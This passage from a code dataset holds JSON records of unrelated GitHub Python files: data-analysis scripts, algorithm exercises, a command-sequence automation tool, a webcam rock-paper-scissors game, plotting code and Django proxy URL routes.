int(retCountDict[str(orderID)]) #key -> user id and value is the number of items that user ordered\n else:\n continue\n\n #finalDict -=> has key the user id and the value is the total number of items they ordered\n #numTimesOrdered -=> key as the user id, value as the total number of orders made by user\n print(avgItems(userList,finalDict,numTimesOrdered))\n\n return 0\n\ndef avgItems(uList,fDict, nTimesOrdered): #userList, finalDict, numTimesOrdered\n avgDict = Counter()\n for users in uList:\n user = users[1]\n totalItems = int(fDict[user])\n totalTimes = int(nTimesOrdered[user])\n avgDict[user] += (totalItems/totalTimes)\n return avgDict\n\n\n\n\ndef numOrdersPerUser():\n numOrders = Counter()\n i = 0\n reader = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\",iterator=True, chunksize=1000)\n columnsForReader = ['user_id']\n df1 = pd.DataFrame(reader, columns=columnsForReader)\n\n for i in range(500):\n numOrders[df1.iloc[i]['user_id']] += 1\n\n return numOrders\n\n\ndef totalNumItemsOrdered():\n numItems = Counter()\n i = 0\n readerFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\")\n ordersFile = 
pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/order_products__prior.csv\")\n colForReaders = [\"order_id\",\"user_id\"]\n colForOrders = [\"order_id\"]\n\n reader = pd.DataFrame(readerFile, columns = colForReaders)\n orders = pd.DataFrame(ordersFile, columns = colForOrders)\n\n\n for i in range(100):\n itemsUserOrdered = itemsOrdered(reader, orders, reader.iloc[i][\"order_id\"], i)\n numItems[reader.iloc[i][\"user_id\"]] += itemsUserOrdered\n return numItems\n\ndef itemsOrdered(rDF, oDF, orderID,i):\n orderIdCounter = Counter()\n retNum = 0\n\n for row in oDF.itertuples():\n if row[1] == orderID:\n retNum += 1\n return retNum\n\n # userID = ordersDF.iloc[i][\"user_id\"]\n # orderID = ordersDF.iloc[i][\"order_id\"]\n #\n # for j in len(itemsDF): #not sure about how to iterate through the thing\n # if itemsDF.iloc[j][\"order_id\"] == orderID:\n # orderIdCounter[orderID] += 1\ndef aussie():\n userDict = pickle.load( open( \"save.p\", \"rb\" ) )\n for i in range(1,4):\n print(\"for i = \",i,\"the value is \",userDict[i]) #where i is is the orderid\n return 0\n\ndef partOne():\n i = 0\n with open(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\") as csvfile:\n reader = csv.reader(csvfile,delimiter=',')\n for row in reader:\n if i < 500 and row[1] != \"user_id\":\n P1[row[1]] += 1\n i += 1\n\n lens = np.arange(len(D))\n plt.bar(lens, P1.values(),width=0.3, align='center',alpha = 0.2)\n plt.xticks(lens, P1.keys())\n plt.show()\n csvfile.close()\n\ndef main():\n # numOrdersPerUser()\n # print(totalNumItemsOrdered())\n # aussie()\n numIterms()\nmain()\n","repo_name":"rishsanyal/finals","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25399600611","text":"\"\"\"\nGiven an array arr[] of N non-negative integers representing the height of blocks at index i as Ai where the width of each block is 1. Compute how much water can be trapped in between blocks after raining.\nThe structure is like below:\n| |\n|_|\nWe can trap 2 units of water in the middle gap.\n\n\n\nExample 1:\n\nInput:\nN = 4\narr[] = {7,4,0,9}\nOutput: 10\nExplanation: Water trapped by the \nblock of height 4 is 3 units, block \nof height 0 is 7 units. 
So, the \ntotal unit of water trapped is \n10 units.\nExample 2:\n\nInput:\nN = 3\narr[] = {6,9,9}\nOutput: 0\nExplanation: No water will be trapped.\nYour Task:\nThe task is to complete the function trappingWater() which returns the total amount of water that can be trapped.\n\nExpected Time Complexity: O(N).\nExpected Auxiliary Space: O(N).\n\nConstraints:\n3 <= N <= 10^7\n0 <= Ai <= 10^8\n\"\"\"\n\ndef trappingWater(arr,n):\n    left = []\n    right = []\n    max = arr[0]\n    for i in range(n):\n        if max <= arr[i]:\n            max = arr[i]\n        left.append(max)\n    max = arr[n-1]\n    for i in range(n-1, -1, -1):\n        if max <= arr[i]:\n            max = arr[i]\n        right.append(max)\n    sum = 0\n    right.reverse()\n    for i in range(n):\n        x = min(left[i], right[i]) - arr[i]\n        if x > 0:\n            sum = sum + x\n    return sum\n","repo_name":"himanshu2801/Geeksforgeeks","sub_path":"Trapping Rain Water.py","file_name":"Trapping Rain Water.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24044069166","text":"import os\nimport subprocess\nimport sys\n\nf = None\naliases = {}\nwithalias = False\n\ndef loadAliases():\n\t\"\"\"\n\tThis function loads the aliases we define in our file Aliases in folder files (./files/Aliases). \n\tIn order for our aliases to work they must have the following format:\n\t\t<command>\t<module>.<function>\n\tFor instance:\n\tcd\tFoldersUtils.changeFolder\n\tThis means, every time a command starts with \"cd\" we will import the module FoldersUtils in folder \"files\" \n\t(if not imported already) and execute the function \"changeFolder\" from that module.\n\tIMPORTANT: Don't use classes, use modules and functions. It won't work otherwise\n\t\"\"\"\n\ttry:\n\t\tprint(\"Loading aliases\")\n\t\tprint(\"Opening file Aliases\")\n\t\t#We load the file Aliases from files which is where we set up which commands we want to replace and using which functions instead\n\t\tvConfig = open(\"./files/Aliases\")\n\t\t#We just go through every line of that file\n\t\tfor line in vConfig:\n\t\t\t#We replace \"\\n\" with nothing so it won't be in the names of our modules/functions\n\t\t\tline = line.replace(\"\\n\",\"\")\n\t\t\t#We split that line using \"\\t\"\n\t\t\tvars = line.split(\"\\t\")\n\t\t\t#We will have two elements at least: the first one is our command, which we use as the key, and then the module.function to execute\n\t\t\taliases[vars[0]] = [vars[1:]]\n\texcept Exception as e:\n\t\tprint(\"Something went wrong when loading our aliases: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\telse:\n\t\t#Files should always be closed, so if our file was opened\n\t\tif(vConfig is not None):\n\t\t\tprint(\"Closing file Aliases\")\n\t\t\t#We close it\n\t\t\tvConfig.close()\n\t\t\tprint(\"Success\")\n\ndef processFile(f,dynamicParameters):\n\t\"\"\"\n\tThis function processes the file where our commands to execute are and executes the commands.\n\t@param f: File where our commands to execute are\n\t@param dynamicParameters: Parameter or list of parameters that our user has given when asked through command line. We will replace each <dynamic> we find\n\tin our lines with these dynamic parameters. If it is just one, we will replace all <dynamic> with that parameter. If not, we will replace them in order.\n\t\"\"\"\n\ttry:\n\t\tprint(\"Process file\")\n\t\t#We define a variable to control if we are inside a new machine/shell or not. By default we won't, so it is False. 
This is important\n\t\t#as if we connect to another machine, we won't be able to just execute our commands\n\t\tinanewshell = None\n\t\t#We get the number of dynamic parameters used in our file\n\t\tnDynamic = f.read().count(\"<dynamic>\")\n\t\t#If we provided more than one dynamic parameter through the keyboard, it is because we will replace them in order so we need to check that\n\t\t#the number of parameters we provided and the number of dynamic parameters the file expects match\n\t\tif(len(dynamicParameters)>1):\n\t\t\t#If the number of parameters we provided and the number of dynamic parameters the file expects don't match we should raise an exception\n\t\t\t#and finish our execution\n\t\t\tif(len(dynamicParameters) != nDynamic):\n\t\t\t\traise Exception(\"The numbers of dynamic parameters provided and dynamic parameters in the config file don't match\")\n\t\t#We need to rewind our file to the beginning now to go line by line\n\t\tf.seek(0,0)\n\t\t#We get a line (a command) from our file in each iteration\n\t\tfor line in f:\n\t\t\t#We clean all \\n of our line\n\t\t\tline = line.replace(\"\\n\",\"\")\n\t\t\t#If we have one or more dynamic parameters to replace\n\t\t\tif(line.count(\"<dynamic>\")>0):\n\t\t\t\t#If we provided more than one dynamic parameter\n\t\t\t\tif(len(dynamicParameters)>1):\n\t\t\t\t\t#For each instance of <dynamic> in that line, we remove the first element in our list of dynamic parameters\n\t\t\t\t\t#and replace the current instance of <dynamic> in the line\n\t\t\t\t\tfor i in range(0,line.count(\"<dynamic>\")):\n\t\t\t\t\t\tdynamicParam = dynamicParameters.pop(0)\n\t\t\t\t\t\t#replace(old_str,new_str,max_count) replaces at most \"max_count\" instances of old_str for new_str\n\t\t\t\t\t\t#in our case, we told it to replace just one\n\t\t\t\t\t\tline = line.replace(\"<dynamic>\",dynamicParam,1)\n\t\t\t\telse:\n\t\t\t\t\t#If we provided just one dynamic parameter, this means we will use the same parameter for all, so we can just replace it\n\t\t\t\t\tline = line.replace(\"<dynamic>\",dynamicParameters[0])\n\t\n\t\t\tprint(line)\n\t\t\t#Now we check if our line is to be executed using aliases or is to be executed in our shell directly\n\t\t\t#So by default we say our line has no aliases defined\n\t\t\twithalias = False\n\t\t\t#And now we check if our line starts with one of our aliases\n\t\t\tfor com in aliases:\n\t\t\t\tif(line.startswith(com)):\n\t\t\t\t\t#If it does, we set withalias to True\n\t\t\t\t\twithalias = True\n\t\t\t\t\t#We load the value linked to our alias and we split it using .\n\t\t\t\t\t#That way we get the module and the function to execute\n\t\t\t\t\tmodule,function = aliases[com][0][0].split(\".\")\n\t\t\t\t\t#We import the module\n\t\t\t\t\tnew_module = __import__(module)\n\t\t\t\t\t#We load the function from that module we set up to execute when we get that command in this line\n\t\t\t\t\tfunc = getattr(new_module, function)\n\t\t\t\t\t#Now we execute our command. We have two options:\n\t\t\t\t\t#We are inside a new machine, docker, shell... so we execute the function we defined for that command (in this case, we shall\n\t\t\t\t\t#always use aliases). In this case, we have to provide the object that represents that connection, which we shall return too\n\t\t\t\t\tif(inanewshell is not None):\n\t\t\t\t\t\tinanewshell = func(inanewshell,line)\n\t\t\t\t\telse:\n\t\t\t\t\t\t#Otherwise, if we are not inside a new machine, shell, docker... 
we just execute the function we defined, but we have to\n\t\t\t\t\t\t#return None if we are not in a new shell or True or an object representing that connection if we just connected to one\n\t\t\t\t\t\tinanewshell = func(line)\n\t\t\t\t\tbreak\n\t\t\t#If our command does not have an alias\n\t\t\tif(withalias == False):\n\t\t\t\t#We just execute it in our shell\n\t\t\t\tprocess = subprocess.Popen(line.split(\" \"), stdout=subprocess.PIPE)\n\t\t\t\toutput, error = process.communicate()\n\t\t\t\tprint(output)\n\n\texcept Exception as e:\n\t\tprint(\"Something went wrong when reading our file: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\ndef main():\n\t\"\"\"\n\tMain function to execute this program.\n\t\"\"\"\n\ttry:\n\t\t#We load our aliases storing them in our global dictionary \"aliases\"\n\t\tloadAliases()\n\t\t#We ask the user to select which command list in folder files he want to load\n\t\tvFile = input(\"Select the file in folder \\\"Files\\\" with the sequence of commands: \")\n\t\t#We open the file selected by the user previously\n\t\tf = open(\"./files/\"+vFile)\n\t\t#We ask the user which list of dynamic parameters he wants to use\n\t\tdynamicParametersCommandLine = input(\"Please, provide here the list of dynamic parameters separated with a blank space (if you provide only one, this will be used in all instances of dynmaic parameters): \")\n\t\t#We generate the list of dynamic parameters (splitting the list provided by the user)\n\t\tdynamicParameters = dynamicParametersCommandLine.split(\" \")\n\t\tprint(dynamicParameters)\n\t\t#We call to method processFile to start executing our commands\n\t\tprocessFile(f,dynamicParameters)\n\texcept Exception as e:\n\t\tprint(\"Something went wrong: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\telse:\n\t\t#We always have to close opened files\n\t\tif(f is not None):\n\t\t\tf.close()\n\t\t\tprint(\"Connection to file closed\")\n\t\tprint(\"Goodbye\")\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"AntoData/sequence_cmd_tasks_scripts_automation","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8778472496","text":"import math\r\n\r\nclass ActorState:\r\n def __init__(self, x=0, y=0, x2=0, y2=0, actor_id=0, target_obj_map={}):\r\n self.x = x\r\n self.y = y\r\n self.x1 = x\r\n self.y1 = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n self.pi = math.pi\r\n self.distance = self.get_distance(x, y, x2, y2)\r\n self.degree = self.get_degree(x, y, x2, y2)\r\n self.id = actor_id\r\n self.obj_map = target_obj_map\r\n self.wait = 15\r\n self.wait_default = 15\r\n\r\n def set_position(self, x, y):\r\n self.x = x\r\n self.y = y\r\n return [self.x, self.y]\r\n\r\n def update_position(self, distance):\r\n xy = self.get_position(distance)\r\n if self.x < self.x2 - distance or self.x > self.x2 + distance:\r\n self.x = xy[0]\r\n elif(self.x == self.x2):\r\n # 目標地点に到達した\r\n if self.wait == 0:\r\n self.x = self.x1\r\n else:\r\n self.x = self.x2\r\n\r\n \r\n \r\n if self.y < self.y2 - distance or self.y > self.y2 + distance:\r\n self.y = xy[1]\r\n elif(self.y == self.y2):\r\n # 目標地点に到達した\r\n if self.wait == 0:\r\n self.y = self.y1\r\n self.wait = 
self.wait_default\r\n else:\r\n self.wait -= 1\r\n else:\r\n self.y = self.y2\r\n \r\n return [self.x, self.y]\r\n\r\n def get_distance(self, x, y, x2, y2):\r\n #print(\"get_distance input x: %f, y: %f, x2: %f, y2: %f\" % (x, y, x2, y2))\r\n distance = math.sqrt((x2 - x) * (x2 - x) + (y2 - y) * (y2 - y))\r\n return distance\r\n\r\n def get_degree(self, x, y, x2, y2):\r\n #degree = math.degrees(math.atan2(y2 - y, x2 - x))\r\n degree = math.degrees(math.atan2(y - y2, x - x2))\r\n return degree\r\n\r\n def get_position(self, distance):\r\n x = self.x - math.cos(math.radians(self.degree)) * (distance)\r\n y = self.y - math.sin(math.radians(self.degree)) * (distance)\r\n return [x, y]\r\n\r\n def get_obj_map(self):\r\n return self.obj_map\r\n\r\n\r\n\r\n\r\n\r\n def _get_radian(self, x, y, x2, y2):\r\n #print(\"get_distance input x: %f, y: %f, x2: %f, y2: %f\" % (x, y, x2, y2))\r\n radian = math.atan2(y2 - y, x2 - x)\r\n return radian","repo_name":"8vana/8vana","sub_path":"1vana/modules/actor_state.py","file_name":"actor_state.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"32165459109","text":"# Given a binary tree, return the zigzag level order traversal of its nodes' values.\n# (ie, from left to right, then right to left for the next level and alternate between).\n#\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its zigzag level order traversal as:\n# [\n# [3],\n# [20,9],\n# [15,7]\n# ]\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n cur_queue = []\n if root is not None:\n cur_queue.append(root)\n\n next_direction = 'to_left'\n while cur_queue:\n level = []\n next_queue = []\n while cur_queue:\n cur = cur_queue.pop(0)\n level.append(cur.val)\n\n if next_direction == 'to_left':\n if cur.left is not None:\n next_queue.append(cur.left)\n if cur.right is not None:\n next_queue.append(cur.right)\n else:\n if cur.right is not None:\n next_queue.append(cur.right)\n if cur.left is not None:\n next_queue.append(cur.left)\n\n result.append(level)\n cur_queue = [x for x in reversed(next_queue)]\n if next_direction == 'to_left':\n next_direction = 'to_right'\n else:\n next_direction = 'to_left'\n\n return result\n","repo_name":"BubbleXu/leetcode","sub_path":"103_binary_tree_zigzag_level_order_traversal/binary_tree_zigzag_level_order_traversal.py","file_name":"binary_tree_zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1917654399","text":"import sys\n\nprimes = []\nprime = [True] * 1000001\nfor i in range(2, int(1000000**0.5)+1):\n if prime[i]:\n for j in range(2*i, 1000001, i): # 배수인경우 False\n prime[j] = False\n\nwhile True:\n n = int(sys.stdin.readline().rstrip())\n\n if n == 0:\n break\n\n flag = False\n for i in range(3, n//2+1, 2): # 홀수 이므로 2씩 더해준다.\n if prime[i] and prime[n-i]: # 소수인 경우\n print(f'{n} = {i} + {n-i}')\n flag = True\n break\n\n if not flag:\n print(\"Goldbach's conjecture is 
wrong.\")","repo_name":"sangyunpark99/Baekjoon_Algorithm","sub_path":"basic(1)/6588.py","file_name":"6588.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31081249140","text":"def extract_player_data(file):\n with open(file) as fle:\n data = fle.readline()\n data = data.strip().split(',')\n return data\n\n\ndef sanitise(time_string):\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter = ':'\n else:\n return time_string\n (mins, secs) = time_string.split(splitter)\n return mins + '.' + secs\n\n\ndef sanitise_and_sort_list_top_3(list):\n clean_list = [sanitise(x) for x in list]\n sorted_list = sorted(set(clean_list))\n return sorted_list[0:3]\n\nprint(extract_player_data('james.txt'))\nprint(sanitise_and_sort_list(extract_player_data('james.txt')))\n\n","repo_name":"derekreilly1990/PythonProjects","sub_path":"ComprehendingData/comprehending.py","file_name":"comprehending.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37155347236","text":"__author__ = 'Dani'\n\nimport random\n\nNUM_SONGS = 45458287 # 45.458.287\nDESIRED_SONGS = 500000 # 500.000\n\n\ndef read_necessary_index_songs(file_path):\n result = set()\n with open(file_path, \"r\") as file_io:\n for line in file_io:\n line = line.replace(\"\\n\",\"\")\n if line != \"\":\n result.add(int(line))\n return result\n\n\ndef generate_several_indexes_from_a_known_range(preliminar, min_value, max_value, desired):\n result = set().union(preliminar)\n while len(result) < desired:\n result.add(random.randint(min_value, max_value))\n return result\n\n\n\npreliminar_set_of_songs = read_necessary_index_songs(\"files/all_discogs_indexes.txt\")\nwhole_set_of_songs = generate_several_indexes_from_a_known_range(preliminar=preliminar_set_of_songs,\n min_value=0,\n max_value=NUM_SONGS,\n desired=DESIRED_SONGS)\n\nwith open(\"files/500000_discogs_song_indexes.txt\", \"w\") as file_io:\n for an_index in whole_set_of_songs:\n file_io.write(str(an_index) + \"\\n\")\n\n","repo_name":"DaniFdezAlvarez/wMERA","sub_path":"apps/building_graph/main_extract_random_index_songs.py","file_name":"main_extract_random_index_songs.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69902805354","text":"from numpy import *\nfrom HaloFuncs import *\nfrom Params import *\nfrom AtomicFuncs import *\n\n# s orbitals\nn_s = array([1]+[3]+[2]*2)\nZ_s = array([1.4595,5.3244,2.6298,1.7504])\nc_1s = array([1.1347900,-0.001613,-0.100506,-0.270779])\nn = int(input(\"Number of values\"))\n\nE_r_vals = logspace(-1.0,4.0,n)/1000.0 # keV\nq_vals = logspace(-1.0,4.0,n)\n\nnp = 20\n\nF1 = zeros(shape=(n,n))\nfor i in range(0,n):\n F1[i,:] = f_nl_ion_sq(q_vals,E_r_vals[i],0,c_1s,n_s,Z_s,np=np)\n print(i,'of',n)\n\nsavetxt('../data/fion/fion_He.txt',vstack((E_r_vals,q_vals,log10(F1))),delimiter='\\t',fmt=\"%1.16f\")\n","repo_name":"cajohare/DarkElectronRecoils","sub_path":"erec/Tabulate_fion_He.py","file_name":"Tabulate_fion_He.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40917290629","text":"\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport time\nimport random\n\n\n\nclass RPS():\n\n\n def __init__(self):\n 
self.computer_choice = [\"rock\", \"paper\", \"scissor\"]\n self.max_seconds_choose = 10\n self.computer_wins = 0\n self.user_wins = 0\n self.rounds = 0\n self.labels = [\"scissors\", \"rock\", \"paper\", \"nothing\"]\n\n def get_computer_choice(self):\n \"\"\"Get computer's choice\n :return: string: computers choice\"\"\"\n computer_choice = random.choice(self.computer_choice)\n print(\"Computer choice is :{}\".format(computer_choice))\n return computer_choice\n \n def get_prediction(self, prediction):\n \"\"\"Get predictions from model, highest value in the array\n :prediction: string : list with the numbers for each label\n :return: prediction identified by the model\"\"\"\n max_arg_index = np.argmax(prediction)\n print(\"Your choice iss : {}\".format(self.labels[max_arg_index]))\n return self.labels[max_arg_index]\n\n def get_user_choice(self):\n \"\"\"Get user's choice, gitve the user 6seconds to choose. If didntm choose increase the count\n :return: string: \n \"\"\"\n model = load_model('converted_keras/keras_model.h5')\n cap = cv2.VideoCapture(0)\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n total_duration = 6\n time_passed = 0\n start_time = time.time()\n\n while True: \n ret, frame = cap.read()\n resized_frame = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n image_np = np.array(resized_frame)\n normalized_image = (image_np.astype(np.float32) / 127.0) - 1 # Normalize the image\n data[0] = normalized_image\n prediction = model.predict(data)\n cv2.imshow('frame', frame)\n # Press q to close the window\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n if time.time() - start_time > total_duration:\n print(\"6 seconds have passed, time it over to choose\")\n if self.get_prediction(prediction) != \"Nothing\":\n print(prediction)\n break \n else:\n print(\"You didnt choose yet\")\n continue\n # After the loop release the cap object\n cap.release()\n # Destroy all the windows\n cv2.destroyAllWindows()\n return self.get_prediction(prediction) \n\n def game_flow(self, user_choice, computer_choice):\n \"\"\"Game flow architecture\n :user_choice: string: input from another function\n :computer_choice:string: input from another function\"\"\"\n\n if user_choice == \"rock\" and computer_choice == \"scissor\":\n self.user_wins +=1\n #return self.user_wins\n if user_choice == \"paper\" and computer_choice == \"rock\":\n self.user_wins +=1\n #return self.user_wins\n if user_choice == \"scissor\" and computer_choice == \"paper\":\n self.user_wins +=1\n #return self.user_wins\n elif user_choice != computer_choice:\n self.computer_wins +=1\n #return self.computer_wins\n\n def still_play(self):\n \"\"\"Function to check if the user still want to play\n :return: bool: True or False\"\"\"\n\n _continue_playing = input(\"Do you still want to continue playing? Type yes or no: \")\n if \"yes\" in _continue_playing.lower():\n return True\n else:\n return False\n \n def get_winner(self):\n \"\"\"Decision check who won and print\"\"\"\n user_choice = self.get_user_choice()\n computer_choice = self.get_computer_choice()\n self.game_flow(user_choice, computer_choice)\n if self.user_wins >= 3:\n print(\"Congratualtions, you won! The score was {} for you against {} for the computer\".format(self.user_wins, self.computer_wins))\n return False\n elif self.computer_wins >= 3:\n print(\"You lost the computer won! 
The score was {} for you against {} for the computer\".format(self.user_wins, self.computer_wins))\n            return False\n        else:\n            print(\"This is round number {}. Let's continue\".format(self.rounds))\n            return True\n\n    def play(self):\n        \"\"\"Function to loop through games if the user wants to keep playing\"\"\"\n        _continue=True\n        while(_continue):\n            self.rounds +=1\n            _continue = self.get_winner()\n\n\nif __name__==\"__main__\":\n    game = RPS()\n    game.play()","repo_name":"alemoraescarv/computer_vision","sub_path":"camera_rps.py","file_name":"camera_rps.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30890095139","text":"import numpy as np\nimport pickle\nfrom pylab import *\n\nimport sys\n\n# Number of simulated days\ndays = 10 \n\n# Logging of values\nkeepEnergyRB = []\nkeepComfortRB = []\nkeepEnergySLSQP = []\nkeepComfortSLSQP = []\nkeepEnergyGA = []\nkeepComfortGA = []\nkeepEnergyGPSS = []\nkeepComfortGPSS = []\n\n# Load results\nbaseResultsFolder = 'Results/Energy/'\nfor ii in range(1, days):\n    \n    # RB (Baseline) Results\n    filename=baseResultsFolder + 'RBworkspace' + str(ii + 1) + '.out'\n    with open(filename, 'rb') as f:\n        policyRB, EnergyRB, ComfortRB, buildingRB = pickle.load(f)\n    keepEnergyRB.append(EnergyRB[-1])\n    keepComfortRB.append(ComfortRB[-1])\n    \n    # SLSQP Results\n    filename=baseResultsFolder + 'SLSQPworkspace' + str(ii + 1) + '.out'\n    with open(filename, 'rb') as f:\n        policySLSQP, EnergySLSQP, ComfortSLSQP, buildingSLSQP = pickle.load(f)\n    keepEnergySLSQP.append(EnergySLSQP[-1])\n    keepComfortSLSQP.append(ComfortSLSQP[-1])\n    \n    # NSGA2 Results\n    filename=baseResultsFolder + 'NSGA2workspace' + str(ii + 1) + '.out'\n    with open(filename, 'rb') as f:\n        policyGA, EnergyGA, ComfortGA, buildingGA = pickle.load(f)\n    keepEnergyGA.append(EnergyGA[-1])\n    keepComfortGA.append(ComfortGA[-1])\n    \n    # GPSS Results\n    filename=baseResultsFolder + 'GPSSworkspace' + str(ii + 1) + '.out'\n    with open(filename, 'rb') as f:\n        policyGPSS, EnergyGPSS, ComfortGPSS, buildingGPSS = pickle.load(f)\n    keepEnergyGPSS.append(EnergyGPSS[-1])\n    keepComfortGPSS.append(ComfortGPSS[-1])\n    \n\n# Plot and log, Comfort Comparison\nsaveResultsFolder = 'Results/Comparisons/'\nfig = plt.figure()\nax = plt.subplot(111)\nax.plot(keepComfortRB, label='Comfort, RB')\nax.plot(keepComfortSLSQP, label='Comfort, SLSQP')\nax.plot(keepComfortGA, label='Comfort, NSGA2')\nax.plot(keepComfortGPSS, label='Comfort, GP_SS')\nplt.title('Comfort Comparison of RB, SLSQP, GA and GP_SS under Energy Minimization Objective')\nax.legend(loc=\"upper left\", bbox_to_anchor=(1,1))\nplt.show(fig)\nart = []\nart.append(ax.legend)\nfig.savefig(saveResultsFolder + 'AllComfortComparisonEnergy.svg', format = 'svg', dpi = 1200, additional_artists = art, bbox_inches = \"tight\")\npickle.dump(fig, open(saveResultsFolder + 'AllComfortComparisonEnergy.figure', 'wb'))\nplt.close(fig)\n\n# Plot and log, Consumption Comparison\nsaveResultsFolder = 'Results/Comparisons/'\nfig = plt.figure()\nax = plt.subplot(111)\nax.plot(keepEnergyRB, label='Consumption, RB')\nax.plot(keepEnergySLSQP, label='Consumption, SLSQP')\nax.plot(keepEnergyGA, label='Consumption, NSGA2')\nax.plot(keepEnergyGPSS, label='Consumption, GP_SS')\nplt.title('Consumption Comparison of RB, SLSQP, GA and GP_SS under Energy Minimization Objective')\nax.legend(loc=\"upper left\", bbox_to_anchor=(1,1))\nplt.show(fig)\nart = []\nart.append(ax.legend)\nfig.savefig(saveResultsFolder + 
'AllConsumptionComparisonEnergy.svg', format = 'svg', dpi = 1200, additional_artists = art, bbox_inches = \"tight\")\npickle.dump(fig, open(saveResultsFolder + 'AllConsumptionComparisonEnergy.figure', 'wb'))\nplt.close(fig)\n\n\n\n","repo_name":"MOEEBIUS/SimulationBasedOptimizationOfBuildingControlStrategies","sub_path":"experiments/TestSimpleRoomOpenLoop/CompareEnergyConsumption.py","file_name":"CompareEnergyConsumption.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36128679151","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n n1,n2=0,0\n while l1:\n n1=n1*10+l1.val\n l1=l1.next\n while l2:\n n2=n2*10+l2.val\n l2=l2.next\n sum=n1+n2\n curr=head=ListNode(0)\n if sum==0: return curr\n while sum:\n head.next=ListNode(sum%10,head.next)\n sum=sum//10\n return curr.next","repo_name":"fikirtederibe/Leetcode","sub_path":"445-add-two-numbers-ii/445-add-two-numbers-ii.py","file_name":"445-add-two-numbers-ii.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6268081201","text":"#상품의 이름 !!#ctrl+스페이스바 활용\nproduct_name = input('상품명을 입력하세요: ')\n#상품의 가격\nprice = int(input('원가를 입력하세요: ')) #int로 형변환을 한거였음(day02기준)\n\n#할인가격\ndiscount = price - price * 0.1\n\n#메세지 출력\nprint(f'{product_name}의 할인가격은 {discount}원입니다.')\n#{}는 변동되는 데이터가 들어갈 때 사용. ' 앞에 f 넣기\nprint(f'{product_name}의 원가는 {price}원이며, 할인가격은 {discount}원입니다.')\n","repo_name":"KRDJK/python_and_memo","sub_path":"day01/input_prac1.py","file_name":"input_prac1.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24604385410","text":"from django.urls import path\nfrom .views import create_site, view_sites, update_site, proxy_view, site_detail, site_statistics\n\napp_name = 'proxy'\n\nurlpatterns = [\n path('create_site/', create_site, name='create_site'),\n path('view_sites/', view_sites, name='view_sites'),\n path('edit_site//', update_site, name='edit_site'),\n path('site_detail//', site_detail, name='site_detail'),\n path('site_statistics/', site_statistics, name='site_statistics'),\n path('//', proxy_view, name='proxy_view')\n]","repo_name":"VladRogozin/vpn","sub_path":"vpn/proxy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23030593016","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport threading\r\nimport uuid\r\nimport json\r\nimport 